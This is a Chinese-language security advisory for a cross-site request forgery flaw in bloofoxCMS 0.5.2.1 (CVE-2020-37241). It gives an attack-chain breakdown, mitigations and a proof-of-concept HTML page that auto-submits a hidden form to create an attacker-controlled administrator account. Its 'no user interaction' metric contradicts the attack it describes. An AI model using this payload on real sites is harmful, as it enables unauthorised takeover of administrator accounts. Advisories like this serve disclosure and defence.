CVE-2020-37241 CVSS 5.3 中危

CVE-2020-37241 bloofoxCMS跨站请求伪造漏洞

披露日期: 2026-05-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2020-37241

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

bloofoxCMS

漏洞概述

bloofoxCMS 0.5.2.1版本存在跨站请求伪造（CSRF）漏洞。攻击者可诱导已登录的管理员访问恶意网页，利用隐藏表单向管理员用户创建端点发送请求，从而在未经授权的情况下添加具有任意凭据的新管理员账户，获取系统控制权。

技术细节

该漏洞的根本原因在于Web应用程序对HTTP请求的合法性校验不足。在bloofoxCMS 0.5.2.1中，创建管理员的接口仅依赖会话状态确认用户身份，而未实施防CSRF机制（如同步令牌模式或检查Referer头）。攻击者首先侦察目标站点，确定添加用户的API参数（如username, password, email）。随后，攻击者构造一个恶意HTML文档，利用JavaScript自动提交表单。该表单字段被设置为攻击者控制的凭据。一旦受害管理员访问此页面，浏览器即会在后台向目标服务器发起POST请求。由于请求中包含了受害者的有效Cookie，服务器信任该上下文并完成账户创建。攻击者随后可利用新建账户登录后台，进一步控制网站内容或进行破坏。

攻击链分析

STEP 1

侦察

攻击者识别目标系统使用bloofoxCMS，并确认管理员登录入口及用户添加功能的接口参数。

STEP 2

制作载荷

攻击者编写包含恶意HTML表单的网页，表单字段预设为新管理员账户信息，并指向CMS的后台添加用户接口。

STEP 3

社会工程学

攻击者通过钓鱼邮件或其他方式，诱导已登录的管理员访问托管该恶意网页的链接。

STEP 4

执行攻击

管理员浏览器在加载页面时，自动携带当前会话Cookie向服务器发送POST请求，服务器误判为合法操作并创建新用户。

STEP 5

获取权限

攻击者使用新创建的管理员账户登录系统，获得完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<html> <body>  <form action="http://<target_ip>/admin/user.php" method="POST"> <input type="hidden" name="username" value="attacker" /> <input type="hidden" name="password" value="P@ssw0rd" /> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="access_level" value="1" /> <input type="hidden" name="send" value="Save" /> </form> <script> // Automatically submit the form when page loads document.forms[0].submit(); </script> </body> </html>

影响范围

bloofoxCMS 0.5.2.1

防御指南

临时缓解措施

建议用户不要点击不明链接或访问不可信的网站。管理员应检查系统中是否存在未知的异常账户。开发者应尽快在后台管理表单中加入随机Token字段，并在服务端进行校验，以阻断伪造请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表